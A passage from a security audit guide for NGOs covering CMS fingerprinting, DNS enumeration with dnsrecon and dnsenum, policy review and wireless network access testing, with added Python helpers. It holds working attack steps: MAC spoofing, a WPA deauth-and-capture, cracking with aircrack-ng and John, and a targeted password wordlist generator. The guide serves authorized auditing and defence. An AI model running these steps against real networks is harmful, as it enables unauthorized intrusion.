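DRUPAL_ENTRY_RE = re.compile(
    r'^Drupal\s+(\d+\.\d+(?:\.\d+)?),\s*(\d{4}-\d{2}-\d{2})', re.MULTILINE)


def cms_from_html(html: str) -> Optional[Dict[str, Optional[str]]]:
    """Return the CMS name and version advertised by the generator meta tag, if any."""
    match = GENERATOR_RE.search(html)
    if match is None:
        return None
    parts = match.group(1).strip().split(None, 1)   # e.g. ["WordPress", "3.3.1"]
    version = parts[1] if len(parts) > 1 and parts[1][0].isdigit() else None
    return {"cms": parts[0], "version": version, "source": "meta generator"}


def drupal_from_changelog(changelog: str) -> Optional[Dict[str, str]]:
    """Return the newest Drupal release listed in a CHANGELOG.txt body."""
    match = DRUPAL_ENTRY_RE.search(changelog)
    if match is None:
        return None
    return {"cms": "Drupal", "version": match.group(1),
            "released": match.group(2), "source": "/CHANGELOG.txt"}


def parse_headers(raw: str) -> Dict[str, str]:
    """Parse a raw HTTP response header block into a lower-cased name -> value dict."""
    headers: Dict[str, str] = {}
    for line in raw.split("\r\n")[1:]:      # skip the status line
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return headers


def ddos_protection(raw_headers: str) -> Optional[str]:
    """Identify a DDoS-mitigation front end from response headers (CloudFlare only here)."""
    headers = parse_headers(raw_headers)
    if headers.get("server", "").lower() == "cloudflare" or "cf-ray" in headers:
        return "CloudFlare"
    return None


def footprint(html: str, changelog: str = "", raw_headers: str = "") -> Dict[str, Optional[str]]:
    """Combine the checks into one record for the audit notes."""
    hit = cms_from_html(html) or (drupal_from_changelog(changelog) if changelog else None)
    return {
        "cms": hit["cms"] if hit else None,
        "version": hit["version"] if hit else None,
        "source": hit["source"] if hit else None,
        "ddos_protection": ddos_protection(raw_headers) if raw_headers else None,
    }


if __name__ == "__main__":
    print(footprint(WORDPRESS_HTML, raw_headers=CLOUDFLARE_HEADERS))
    print(footprint("<html><body>custom site</body></html>", changelog=DRUPAL_CHANGELOG))
```

A site that strips its generator tag and removes CHANGELOG.txt will come back with no CMS; that is itself worth a line in the report, and the page's other hints (default template copyright dates, plugin paths) still apply.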

Document your findings, listing the type of CMS your target is using along with its version. You can use this information in the next possible activities:


Recommendation

Most popular CMS platforms provide emailed alerts and semi-automated ways to update their software. Make sure that someone responsible for the website either receives these emails or checks regularly for available updates. Security updates should be applied immediately. It is best practice, however, to have a "test" site where you first deploy any CMS update before applying it to the production site.

For custom CMS systems, it is strongly advisable to migrate to a more standard, open source system.

An increasingly good practice is for organizations to take advantage of the "free" tiers of DDoS mitigation services, of which CloudFlare is probably the best known. A challenge of these free services can be that they have definite limits to their protection. With CloudFlare, organizations can request to be a part of their Project Galileo program to support at-risk sites even beyond their normal scope of support.

A community-based, open source alternative is Deflect, which is completely free for eligible sites.

Some of these services will be revealed by BuiltWith, but you can also check the HTTP response headers directly (in Chromium/Chrome, available under the Inspect Element tool, or by using Firebug in Firefox). See Deflect's wiki for more information.

Guide for NGOs about DDoS: Digital First Aid Kit

DNS Enumeration

Summary

DNS stands for Domain Name System. In a nutshell, it translates host/computer names into their IP addresses: it provides a way to learn the IP address of any given machine on the Internet from its corresponding URL or domain. You can think of it as the telephone directory of the Internet.

DNS enumeration is one of the initial steps in your overall vulnerability assessment and audit, and a stage that lets you discover more potential targets. On completing it you may find issues such as information leaked by default settings and server misconfigurations, and you will have a broader set of targets, such as internal server IP addresses, company netblocks, and domain/subdomain names.

DNS enumeration can be accomplished with a number of different tools and approaches. This guide discusses some of the approaches and the tools required for each activity. You can perform DNS enumeration passively or actively, depending on your operational security needs.

The passive, or "indirect", approach refers to enumeration that sends no traffic or packets from your machine directly to the target. This can be done using third-party tools such as online services and cloud-based scanners.

The active, or "direct", approach refers to sending DNS queries and enumeration tests directly to the target. Consider that the traffic is sent to the target's servers, which may keep traces or traffic logs showing your source IP. Active techniques include zone transfer, reverse lookup, domain and host brute forcing, standard record enumeration (wildcard, SOA, MX, A, TXT, etc.), cache snooping, and zone walking.

Overview
Materials Needed
Considerations
Walkthrough

Having multiple options for performing DNS enumeration is key to a successful enumeration. As a practice, comparing results helps assure that the information gathered is accurate. Your investigation may be blocked by CloudFlare, a popular DDoS protection service; "CloudFlair" provides some options in this case.

DNS Enumerations Tools:

| Tool | Description | Type | Technique |
|---|---|---|---|
| Robtex | Gathers public information about IP numbers, domain names, host names, autonomous systems, routes, etc., indexes the data in a big database and provides free access to it | Online | Passive |
| DNSdumpster | Free domain research tool that can discover hosts related to a domain; results include banners for HTTP, FTP, SSH and Telnet | Online | Passive |
| CentralOps Domain Dossier | Investigates domains and IP addresses. Gathers registrant information, DNS records, network and domain Whois records, service scans and traceroutes | Online | Passive |
| DNSSEC Analyzer | Checks DNSSEC key management and configuration records | Online | Passive |
| Recon-ng | Automated web reconnaissance framework written in Python. Complete with independent modules, database interaction, built-in convenience functions, interactive help and command completion | Script | Active |
| IntoDNS | Checks the health and configuration of your DNS, reports on MX records too, and suggests fixes and improvements | Online | Passive |
| YouGetSignal | Finds other sites hosted on a particular IP address, to verify whether the target is on shared hosting | Online | Passive |
| DNSRecon | Python script written by Carlos Perez for DNS reconnaissance. It can enumerate general DNS records, perform zone transfers, perform reverse lookups, and brute-force subdomains, among other functions. It will even perform Google scanning, automating the process discussed in the Using Google to find subdomains section | Script | Active |
| DNSenum | Multithreaded Perl script to enumerate DNS information for a domain and discover non-contiguous IP blocks | Script | Active |

Specific instructions for selected tools/techniques follows:

Passive: Third Party and Online Tools

Using third-party and online tools helps an auditor/tester avoid generating logs on the target's end from his or her own machine. Where the target, or the partner organization that requested the audit/assessment, has security devices in place (IDS/IPS, firewalls, etc.), traffic from your machine/network may end up blocked by the "automatic blocking" features of these devices/appliances.

Passive tools include:

Active: DNSrecon

DNSrecon (available in the Kali 2017 release) is a powerful DNS enumeration script that can help an auditor gather information during the recon stage. It checks all NS records for zone transfers, enumerates general DNS records for a given domain (MX, SOA, NS, A, AAAA, SPF and TXT), and performs SRV record enumeration and TLD (Top Level Domain) expansion, to name a few of its functions.

This exercise will help you perform some of the DNS enumeration methods using DNSrecon and generate information which you can add to your database for use in other avenues of testing.

Perform basic DNS enumeration on the target:

 root@kali:~# dnsrecon -d <target.domain>

Perform DNS zone transfer enumeration (both forms request AXFR from every NS record found):

 root@kali:~# dnsrecon -d <target.domain> -a
 root@kali:~# dnsrecon -d <target.domain> -t axfr

Perform a reverse lookup over an address range:

 root@kali:~# dnsrecon -r <start-IP>-<end-IP>

Domain brute force with a wordlist:

 root@kali:~# dnsrecon -d <target.domain> -D <namelist> -t brt

Cache snooping against a resolver:

 root@kali:~# dnsrecon -t snoop -n <server> -D <dictionary>

Zone walking (DNSSEC NSEC records):

 root@kali:~# dnsrecon -d <target.domain> -t zonewalk

Active: DNSenum

DNSenum, like DNSrecon, is a tool designed to analyze the DNS information of a specific target. For zone transfers, hostname and subdomain dictionary brute force, reverse lookups, service record and standard record queries, and top level domain expansion, the results of the two tools are almost identical.

You can use DNSenum from the Kali terminal, or from the MSF console as an auxiliary module.

To run DNSenum, simply type the command dnsenum (add -h for the help options).

root@kali:~# dnsenum

The table below will help you get started with your DNS enumeration using dnsenum tool.

| Command | Description |
|---|---|
| dnsenum -h | Display help options |
| dnsenum domain.com | Basic DNS enumeration |
| dnsenum --enum domain.com | Fast enumeration (equivalent to --threads 5 -s 15 -w) |
| dnsenum -f list.txt -r domain.com | Hostname and subdomain dictionary brute force using list.txt, recursing (-r) into subdomains found |
| dnsenum -f list.txt -s 5 -p 5 domain.com | Enumerate using the subdomain list (list.txt), scraping 5 subdomains (-s) from 5 Google result pages (-p) |
| dnsenum -f list.txt -o result.xml internews.org | Enumerate the target with the subdomain list (list.txt) and write the output in XML format (-o) |

Active: DNS Zone Transfer

Active: MX Records

MX, or Mail Exchange, records must be public for any domain that receives email. They can still reveal sensitive information about an organization's hosting set-up and the office software in use through further scanning (see Vulnerability Scanning): MX records can point to vulnerable mail servers or reveal information about other services hosted internally. Unless other assessments reveal specific vulnerabilities in the e-mail services used, there is no specific action to take. If an organization is self-hosting email, it may be advisable to suggest outsourcing it if funds permit. While self-hosted email provides more control and potentially more security, managing the security of the server is a complex job. Hosted mail services can provide some protection by acting as a first-pass check for spam and viruses, and by (slightly) reducing the visibility of the organizational mail server.

root@kali:~# host -t mx sample.org
sample.org mail is handled by 21 mail.sample.org

Determine the IP address of the mail server:

root@kali:~# host mail.sample.org
mail.sample.org has address 192.0.2.3

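
To show what an auditor does with the output of a successful zone transfer or an MX lookup, here is an added Python example (not part of the SAFETAG guide, and not code from dnsrecon or dnsenum) that triages a zone dump in the whitespace-separated presentation format produced by "dig axfr" or "host -l". The zone below is constructed for the example, and the list of hostname fragments treated as "interesting" is the author's assumption. It lists the MX hosts, flags RFC 1918 addresses that leak internal servers, and picks out hostnames that suggest admin, staging or VPN infrastructure:

```python
import ipaddress
from typing import Dict, List

# Constructed zone dump in dig/host presentation format (not a real organization).
ZONE_DUMP = """\
; <<>> DiG 9.x <<>> axfr sample.org @ns1.sample.org
sample.org.            3600  IN  SOA    ns1.sample.org. hostmaster.sample.org. 2012012301 7200 900 1209600 3600
sample.org.            3600  IN  NS     ns1.sample.org.
sample.org.            3600  IN  MX     21 mail.sample.org.
sample.org.            3600  IN  TXT    "v=spf1 mx ip4:192.0.2.3 -all"
mail.sample.org.       3600  IN  A      192.0.2.3
www.sample.org.        3600  IN  A      192.0.2.10
vpn.sample.org.        3600  IN  A      192.0.2.11
intranet.sample.org.   3600  IN  A      10.0.1.20
fileserver.sample.org. 3600  IN  A      192.168.1.5
staging.sample.org.    3600  IN  CNAME  www.sample.org.
"""

# RFC 1918 ranges only: an A record pointing here leaks an internal server to the Internet.
RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
# Hostname fragments worth a second look during an audit (assumed list, extend as needed).
INTERESTING = ("vpn", "intranet", "staging", "test", "dev", "admin", "backup", "old", "file")


def parse_zone(dump: str) -> List[Dict[str, str]]:
    """Parse 'name ttl class type rdata' lines; comments (;) and blank lines are skipped."""
    records = []
    for line in dump.splitlines():
        line = line.strip()
        if not line or line.startswith(";"):
            continue
        fields = line.split(None, 4)
        if len(fields) < 5:
            continue
        name, _ttl, _klass, rtype, rdata = fields
        records.append({"name": name.lower(), "type": rtype.upper(), "rdata": rdata})
    return records


def is_internal(ip: str) -> bool:
    """True for RFC 1918 addresses; non-addresses (CNAME targets, etc.) are never internal."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return any(addr in net for net in RFC1918)


def triage_zone(dump: str) -> Dict[str, List[str]]:
    """Summarize a zone transfer: hosts, MX targets, leaked internal IPs, interesting names."""
    records = parse_zone(dump)
    hosts = sorted({r["name"] for r in records if r["type"] in ("A", "AAAA", "CNAME")})
    mx = [r["rdata"].split()[-1] for r in records if r["type"] == "MX"]
    internal = [f'{r["name"]} -> {r["rdata"]}' for r in records
                if r["type"] == "A" and is_internal(r["rdata"])]
    interesting = [h for h in hosts if any(k in h.split(".")[0] for k in INTERESTING)]
    return {"hosts": hosts, "mx": mx, "internal": internal, "interesting": interesting}


if __name__ == "__main__":
    for key, values in triage_zone(ZONE_DUMP).items():
        print(key)
        for value in values:
            print("   ", value)
```

Every MX target and every "interesting" host found this way becomes a candidate for the later vulnerability scanning stage; the internal addresses go straight into the findings as a misconfiguration, whether or not anything else is wrong with the zone.
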
Recommendation

DNS is inherently public information, but there are still many steps we can take to secure any parts of it which reveal more private information. Fortinet provides a set of good recommendations:

https://blog.fortinet.com/2016/03/10/10-simple-ways-to-mitigate-dns-based-ddos-attacks

If a zone transfer was successful, (most providers automatically limit anonymous zone transfers), you will need to work with their support team to prevent this, or switch to a different DNS provider. If your organization maintains its own DNS servers, the administrator of those servers should check the zone transfer policies to prevent anonymous transfers.

Organizational Policy Review

Summary

This methodology explores existing organizational practices, informal agreements, and policies around managing information security and responding to threats. It also seeks to reveal presumptions made within the organization which are neither shared (informally or otherwise) nor codified in policies.

Purpose

Many smaller organizations do not have formal policies around information security. This is not inherently good or bad, as informal agreements and practices often take their place. The goal of this component is to reveal any presumptions that are not shared, to help set more formalized agreements across the organization, and to cross-verify these policies, practices, guidelines, and informal agreements against what is actually taking place (generally using activities from the data assessment and device assessment methodologies).

The Flow Of Information

User Device Assessment Information Flow
User Device Assessment Information Flow

Guiding Questions

Specific aspects to explore are:

Approaches

Outputs

Operational Security

Preparation

If you have received copies of policies (through interviews or even the audit agreement process), a thorough review of the written policies is required to assess whether they are being followed, enforced, or have changed since being formalized.

Resources

Organizational Policies

Activities

Identifying Informal Agreements

Summary

The activity aims to assess which kinds of informal agreements regarding best practices and security directives are formulated, accessed, implemented and/or enforced across the organization.

Overview
Materials Needed
Considerations
Walkthrough
  1. Build a list of situations where security policies, if followed, would prevent or reduce the impact of a problem; ideally using the Threat Modeling exercise and inputs from Process Mapping, Capacity Assessment, and other methods and activities. These situations can be related to regular operations (looking for best practices) and risks (looking for security procedures).

For small and medium sized organizations, arrange group conversations around a few specific what-if scenarios (this can be integrated with the Data Mapping or Process Mapping approaches).

Discussions can include:

  2. Meet with members of the organization and present to them the situations on the previous list, asking if there are codes or agreements regarding the security aspects of the situations presented. Take notes of the responses and of any differences in the criteria or in the knowledge of the agreements; such differences are often explained by a lack of documentation and of formal ways to transmit the agreements.

  3. Build a map of practices in three terms:

Recommendation

There must be a good understanding of the organization's capacity and commitment to implementing and maintaining formal security policies. Based on this assessment, consider beginning with more informal agreements among staff that are easy and effective to adopt and still help centralize their approach to security, improve their preventative measures, and improve their ability to respond to incidents. Encourage a "testing" phase of these practices, after which the organization can begin formalizing the ones that work and test new approaches for any that did not.

Security policy review

Summary

The activity aims to understand the organization's internal security policy context: looking for existing policies, understanding how they translate into practice and/or are enforced, evaluating them, and identifying potential improvements or updates.

Overview
Materials Needed
Considerations
Walkthrough
  1. Ask for documentation - this may come out of Capacity Assessment work
  2. Review documentation and compare with existing baselines, and against identified vulnerabilities - do these policies help mitigate risks? (see references)
  3. Propose a map like the one in the Identifying Informal Agreements activity
Recommendation

There must be a good understanding of the organization's capacity and commitment to implementing and maintaining formal security policies. Based on this assessment, consider beginning with more informal agreements among staff that are easy and effective to adopt and still help centralize their approach to security, improve their preventative measures, and improve their ability to respond to incidents. Encourage a "testing" phase of these practices, after which the organization can begin formalizing the ones that work and test new approaches for any that did not.

Conduct Interviews

NOTE: Covered in full under Capacity Assessment

A Day in the Life

NOTE: Covered in full under Organizational Device Assessment

Network Mapping

Summary

This component allows the auditor to identify security issues with the host's network and map the devices on a host's network, the services that are being used by those devices, and any protections in place.

Purpose

Mapping an organization's network exposes the multitude of devices connected to it -- including mostly forgotten servers -- and provides the baseline for later work on device assessment and vulnerability research.

This process also reveals outside service usage (such as google services, dropbox, or others) which serve -- intentionally or not -- as shadow infrastructure for the organization. In combination with beacon research from the Monitor Open Wireless Traffic exercise, many devices can be associated with users.

The Flow Of Information

Network Mapping Information Flow
Network Mapping Information Flow

Guiding Questions

Approaches

Outputs

Operational Security

Preparation

Baseline Skills

Resources

Network Mapping Methods

Wireless Access Guides & Resources

Nmap Scanning

Activities

Wireless Range Mapping

Covered in full in Physical and Operational Security

This component consists of wireless scanning and wireless signal mapping. It is useful for organizations with offices in shared spaces/buildings/apartment complexes or near locations where an adversary could easily "listen" to network traffic. In conjunction with the Monitoring Open Wireless Traffic exercise, it can also identify devices using that network. It is useful to do this in parallel with Office Mapping to build a more comprehensive view of the information assets of the organization.

Monitor open wireless traffic

Covered in full in Physical and Operational Security

Each wireless device maintains a "memory" of the networks it has successfully connected to. When connecting to a network, it sends out "probes" for all of the networks in this memory. It is important to note that this data is broadcast widely and can be collected without any network access, only proximity to the device.

These network probes can often contain names (especially from mobile phone tethers), organizational affiliations, device manufacturers, and a mixture of other potentially valuable data (home network names, recent airports/travel locations, cafés and conference networks). If there are many networks in the office's vicinity, this activity can also help identify the specific office network (if there is any doubt). In many cases, an organization may not want the name of their wireless network to be associated with their organization, but it may be revealed by this additional meta-data.

Beacons can "de-anonymize" an obfuscated network name as well as provide rich content for social engineering attacks. This provides an only-lightly-invasive introduction to discuss the trackability of devices, particularly mobiles and laptops.

Network Access

Summary

This activity helps auditors to test the strength of defenses the organizations' network has in place to protect their local area network. This component consists of gaining access to the local area network through a wireless access point and unsecured physical channels (such as an ethernet jack).

Overview

Note: Cracking wireless passwords often takes a huge amount of time, and the same results for the audit and for organizational buy-in can be had simply by showing how password cracking works and how far outside the office the wireless network can be seen. Once an organization is found to be using a vulnerable authentication method, you can flag it right away as a finding. Given that the recommendations are usually the same (move to WPA2, and WPA3 as it becomes available; disable WEP and WPS; provide a separate guest network; etc.), this should rarely be used during an audit, although it is a useful skill to practice and understand. If you do choose to use it during an audit, be aware that many of the steps disrupt network traffic, and that success with WPA2 password cracking is by no means guaranteed, so it can backfire.

Considerations

Note: This section is one of the few sections where the SAFETAG audit does go through attack scenarios, from attempting to "break in" to the wireless network to testing exposed ethernet jacks for connectivity.

The reasons for this are threefold. First, access to an organization's internal network tends to reveal sensitive data and "shadow" infrastructures (such as dropbox usage) that lead to many recommendations to improve access control and discussions of the value of defense in depth. Second, the specific act of breaking the wifi password allows for a discussion on password security without attacking any specific user's password. Finally, with wireless networks treated as equivalent to wired networks in many offices, reminding the organization that wireless networks extend beyond the physical walls of the office is useful in discussing password rotation and guest network policies.

Once you have access to the network, you need to first document how you managed that and share it with the hosts. This is a great moment to discuss passwords in many cases.

Walkthrough

Breaking into a network requires specialized tools as well as a significant amount of time spent capturing authentication packets and replaying them to the wireless access point.

MAC filtering is a common but easy-to-bypass security measure.

WEP (Wired Equivalent Privacy) has several well-known vulnerabilities. The RC4 algorithm that it uses to generate the keystream for encryption is subject to two separate weaknesses.

WPA/WPA2 (Wi-Fi Protected Access), on the other hand, is vulnerable to the attack known as KRACK (Key Reinstallation Attacks) as well as to offline (high speed) attacks against the password itself. WPS, a common "feature" that is on by default on many WPA access points, has significant vulnerabilities.

WPA3, a newer standard, is built to disallow offline password attacks, making it significantly harder to break into than WPA2 networks. As it becomes available and devices support it, it should be a priority upgrade wherever wifi network security is a concern.


WEP Cracking

The auditor can be guaranteed to access a WEP network with sufficient time by cracking the WEP key.

References

For educational purposes, if no WEP network is available, you can use this pre-built airodump-ng capture file and skip the airodump-ng and aireplay-ng packet injection steps.


MAC Filtering Bypass

Open and MAC-address-filtered wireless access points are not only open to anyone within range to join and listen in to, but also do not provide protection to those on the network itself, even if they do not "broadcast" their name. These may seem like great ways to prevent unauthorized users from accessing your network without resorting to passwords, but they are trivial to overcome.

Auditing MAC address filtered access point

The auditor can easily gain access to an open or MAC address filtered access point: note the MAC address of a client that is already associated (the STATION column in airodump-ng), then clone it.

 # list the access point and its associated clients
 airodump-ng mon0
 # change our MAC address to one that is on the whitelist
 ifconfig mon0 down
 macchanger -m [MAC ADDRESS IDENTIFIED] mon0
 ifconfig mon0 up

References


WPA Cracking

The organization’s wireless Local Area Network (WLAN) protects the network and its users with WPA encryption. This is an important security measure, and a WPA-protected wireless network is much safer than an unencrypted “open” network or a WEP-protected network. (WEP is fundamentally flawed, and extremely simple attacks have been widely known for over a decade.) However, the ease with which an attacker could guess the WPA key, or “WiFi password,” is a serious issue, particularly considering its importance as an essential perimeter control. An attacker who gains access to the wireless LAN immediately bypasses many protections that network administrators, and other users of the office network, often take for granted. Put another way, anyone able to guess the WPA key is immediately “inside the firewall.”

Using a laptop and a wireless card with a standard, internal antenna (or using a customized smartphone or other small device), an attacker could easily position themselves close enough to the office to carry out the first phase of this attack, which would only take a few minutes. The second phase, which is supposed to be the difficult part, could take even less time. From the privacy of their own home or office, the attacker could use a minimally customized password dictionary to guess the WPA key.

Materials Needed

Instructions

An attacker can crack the office’s WPA key in approximately with a short and minimally customized password dictionary based on open information about the organization and basic word collections.

Step 1: The attacker customizes their WiFi password dictionary, adding phrases related to the subject: organization name, street address, phone number, email domain, wireless network name, etc. Common password fragments are included, as well: qwerty, 12345, asdf and all four-digit dates back to the year 2001, for example, among others. The attacker may then add hundreds or thousands of words (in English and/or other relevant languages).

See the Password Strength exercise for details on password dictionary building and usage.
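The dictionary customization in Step 1, as an added Python example (not part of the SAFETAG guide, and not the tool used in the Password Strength exercise): it combines organization-specific seeds with the common fragments named above and four-digit years from 2001 up to a given year, applies simple case and suffix mangling, and keeps only candidates that are legal WPA passphrases (8 to 63 printable ASCII characters), so no cracking time is spent on strings the access point could never have accepted. The seed values are constructed for the example.

```python
from typing import Iterable, List, Set

# Fragments the text mentions; a real run adds hundreds of words in the relevant languages.
COMMON_FRAGMENTS = ["qwerty", "12345", "asdf", "password", "123456", "admin"]


def seed_variants(seed: str) -> List[str]:
    """Case and spacing variants of one organization-specific seed ("Sample Org" -> sampleorg ...)."""
    seed = seed.strip()
    compact = seed.replace(" ", "").replace("-", "")
    variants: List[str] = []
    for variant in (seed, compact, compact.lower(), compact.capitalize(), compact.upper()):
        if variant and variant not in variants:
            variants.append(variant)
    return variants


def wpa_candidates(seeds: Iterable[str], last_year: int, first_year: int = 2001) -> List[str]:
    """Ordered, deduplicated WPA-PSK wordlist: seeds, seeds+years, seeds+fragments, fragments+years."""
    years = [str(y) for y in range(first_year, last_year + 1)]
    suffixes = years + [y[2:] for y in years] + COMMON_FRAGMENTS
    seen: Set[str] = set()
    candidates: List[str] = []

    def add(word: str) -> None:
        # Only legal WPA2-PSK passphrases (8..63 printable ASCII characters) are worth a try.
        if 8 <= len(word) <= 63 and word.isascii() and word.isprintable() and word not in seen:
            seen.add(word)
            candidates.append(word)

    bases: List[str] = []
    for seed in seeds:
        for variant in seed_variants(seed):
            if variant not in bases:
                bases.append(variant)

    for base in bases:
        add(base)
        for suffix in suffixes:
            add(base + suffix)
            add(base + "!" + suffix)
        for fragment in COMMON_FRAGMENTS:
            add(fragment + base)
    for fragment in COMMON_FRAGMENTS:
        add(fragment)                  # usually dropped: too short on its own
        for year in years:
            add(fragment + year)
    return candidates


if __name__ == "__main__":
    # Constructed seeds: organization name, phone number, email domain.
    words = wpa_candidates(["Sample Org", "202-555-0100", "sampleorg.org"], last_year=2012)
    print(len(words), "candidates; first ten:", words[:10])
```

The order matters: organization-specific guesses go first because, at roughly one PBKDF2 computation per guess, a WPA dictionary run is slow enough that the most likely candidates should be tried before the generic ones.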

Step 2: The attacker would then begin recording all (encrypted) wireless traffic associated with the organization’s access point:

$ sudo airodump-ng -c 1 --bssid 1A:2B:3C:4D:5E:6F -w sampleorg_airodump mon0

 CH  1 ][ Elapsed: 12 mins ][ 2012-01-23 12:34 ][ fixed channel mon0: -1
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 1A:2B:3C:4D:5E:6F  -70 100    12345    43210    6   1  12e. WPA2 CCMP   PSK sampleorg
 BSSID              STATION            PWR   Rate    Lost  Packets  Probes
 1A:2B:3C:4D:5E:6F  01:23:45:67:89:01    0    0e- 0e   186    12345
 1A:2B:3C:4D:5E:6F  AB:CD:EF:AB:CD:EF    0    1e- 1      0     1234
 1A:2B:3C:4D:5E:6F  AA:BB:CC:DD:EE:FF  -76    0e- 1      0     1122
 1A:2B:3C:4D:5E:6F  A1:B2:C3:D4:E5:F6  -80    0e- 1      0     4321

wifite is also useful for this step, and claims to automatically de-auth (step 3).

Step 3: Next, the auditor forces a wireless client, possibly chosen at random, to disconnect and reconnect (an operation that is nearly always invisible to the user).

In the example below, AB:CD:EF:AB:CD:EF is the MAC address of a laptop that was briefly disconnected in this way.

$ aireplay-ng -0 1 -a 1A:2B:3C:4D:5E:6F -c AB:CD:EF:AB:CD:EF mon0

 15:54:48  Waiting for beacon frame (BSSID: 1A:2B:3C:4D:5E:6F) on channel -1
 15:54:49  Sending 64 directed DeAuth. STMAC: [AB:CD:EF:AB:CD:EF] [ 5| 3 ACKs]

The goal of this step is to capture the cryptographic handshake that occurs when the targeted client reconnects. Try using different clients if the first one doesn't work, or try (physically) moving around.

This handshake does not contain the WPA key itself, but once the complete handshake has been captured, the auditor (or a potential attacker) can leave the vicinity and run various password cracking tools to try to discover the password. While a complete password cracking tutorial is out of scope for SAFETAG documentation, below are three strategies:

Step 4: The auditor attempts to discover the WPA password.

A good wordlist with a few tweaks tends to break an unfortunate number of passwords. Using a collection of all English words, all words from the language of the organization being audited, plus combinations of these words, plus relevant keywords, addresses and years tends to crack most wifi passwords.

    $ aircrack-ng -w pwdpairs.txt -b 1A:2B:3C:4D:5E:6F sampleorg_airodump*.cap

For WPA captures, John the Ripper can either feed candidate passwords into an aircrack-ng process or attack a capture directly. For the latter, you first have to convert the .cap file (from Wireshark, wifite, airodump-ng, etc.) into a format that John understands. The Jumbo version we use provides a conversion tool for this:

  $ wpapcap2john wpa.cap > crackme
  $ ./john --wordlist=password.lst --format=wpapsk-cuda crackme

Results

Output from a successful run, with the candidate passwords piped into aircrack-ng:

 Opening sampleorg_airodump-01.cap
 Reading packets, please wait...
                                 Aircrack-ng 1.1
                    [00:00:05] 9123 keys tested (1876.54 k/s)
                           KEY FOUND! [ sample2012 ]

      Master Key     : 2A 7C B1 92 C4 61 A9 F6 7F 98 6B C1 AB 53 7A 0F
                       3C AF D7 9A 0C BD F0 4B A2 44 EE 5B 13 94 12 12

      Transient Key  : A9 C8 AD 47 F9 71 2A C6 55 F8 F0 73 FB 9A E6 1D
                       23 D9 31 25 5D B1 CF EA 99 2C B3 D7 E5 7F 91 2D
                       56 25 D5 9A 1F AD C5 02 E3 2C C9 ED 74 55 BA 94
                       D6 F5 0A D1 3B FB 39 40 19 C9 BA 65 2E 49 3D 14

      EAPOL HMAC     : F1 DF 09 C4 5A 96 0B AD 83 DD F9 07 4E FA 19 74

The “keys tested” line of the above output provides some useful information about the effectiveness of a strong WPA key. At that rate of approximately 2000 keys per second, a full-on, brute-force attack against a similar-length key that was truly random (and therefore immune to dictionary-based attacks) would have to test about 70^9 keys, which works out to roughly 20 trillion seconds, or well over 600,000 years. Or, for those who favor length and simplicity over brevity and complexity, a key containing four words chosen from among the 10,000 most common English dictionary words would still take approximately 150,000 years to crack (using this method on an average laptop).

It is worth noting that an attacker with the resources and the expertise could increase this rate by a factor of a hundred. Using a computer with powerful graphics processing units (GPUs) or a cloud computing service like Amazon’s EC2, it is possible to test 250,000 or more keys per second. A setup like this would still take several lifetimes to guess a strong password, however.
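To make the arithmetic above reusable when advising an organization on key length, here is an added example (it is not SAFETAG's own code) that computes the keyspace, the guessing entropy and the time needed to exhaust it for the cases discussed above and for the key sizes recommended later in this section. The 70-symbol alphabet, the 10,000-word dictionary and the two guess rates are the figures from the text; the one-million-entry custom dictionary case is an assumption added to show how a guessable key compares.

```python
"""Estimate how long exhaustive guessing of a WPA key would take.

Added example, not SAFETAG's own code. The guess rates, the 70-symbol
alphabet and the 10,000-word dictionary are the figures quoted in the
text above; "years" is the time to try every key, so an attacker who
gets lucky needs about half of that on average.
"""
import math

SECONDS_PER_YEAR = 365.25 * 24 * 3600
LAPTOP_RATE = 2_000        # keys/s, as in the aircrack-ng output above
GPU_CLOUD_RATE = 250_000   # keys/s, the GPU/cloud figure from the text


def random_keyspace(length, alphabet_size=70):
    """Number of keys of `length` symbols drawn from `alphabet_size` symbols."""
    return alphabet_size ** length


def passphrase_keyspace(words, dictionary_size=10_000):
    """Number of passphrases made of `words` words from a dictionary."""
    return dictionary_size ** words


def entropy_bits(keyspace):
    """Guessing entropy of a key chosen uniformly from `keyspace` candidates."""
    return math.log2(keyspace)


def years_to_exhaust(keyspace, rate):
    """Years needed to test every key at `rate` keys per second."""
    return keyspace / rate / SECONDS_PER_YEAR


def strength_report(rate=LAPTOP_RATE):
    """Compare the cases discussed in the text plus the recommended sizes."""
    cases = {
        "9 random symbols (70-symbol alphabet)": random_keyspace(9),
        "12 random symbols (recommended minimum)": random_keyspace(12),
        "4 words from the 10,000 most common": passphrase_keyspace(4),
        "5 words from the 10,000 most common": passphrase_keyspace(5),
        "1,000,000-entry custom dictionary (assumed)": 1_000_000,
    }
    return {name: (round(entropy_bits(ks), 1), years_to_exhaust(ks, rate))
            for name, ks in cases.items()}


if __name__ == "__main__":
    for rate in (LAPTOP_RATE, GPU_CLOUD_RATE):
        print(f"--- {rate:,} keys/s ---")
        for name, (bits, years) in strength_report(rate).items():
            if years >= 1:
                when = f"{years:,.0f} years"
            else:
                when = f"{years * SECONDS_PER_YEAR:,.0f} seconds"
            print(f"{name:45s} {bits:6.1f} bits  {when}")
```

The report makes the point of the recommendations concrete: a key drawn from a customized dictionary of a million entries falls in minutes at laptop speed, while the recommended sizes stay out of reach even at the GPU/cloud rate.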

Regardless, the success of this attack against a wireless network would allow an attacker to bypass all perimeter controls, including the network firewall. Without access to the office LAN, a non-ISP, non-government attacker would have to position themselves on the same network as an external staff member in order to exploit any flaws in the organization’s email or file-sharing services. With access to the local network, however, that attacker could begin carrying out local attacks quite quickly, and from a distance.

See the Wireless Range Mapping activity for guidance on mapping the reach of the wifi network.

References


WPS PIN Cracking

WPS was built as an addition to WPA to make it easier to add devices without typing in secure passwords, but this ease of use means that a malicious actor can pose as a device and effectively reduce the potentially very difficult passwords WPA allows down to a simple numeric-only 8 character PIN. Further, the WPS system allows an attacker to work on this PIN in two separate halves, further reducing its security. This, like WEP, is a "live" attack (you have to stay connected to the network), but also like WEP, it is a guaranteed attack: brute forcing the WPS PIN will eventually (2-10 hours) allow network access.

Instructions

References

Recommendation

Recommendations for non-WPA networks

Transitioning to WPA networks with strong passwords, even for guest networks, is recommended.

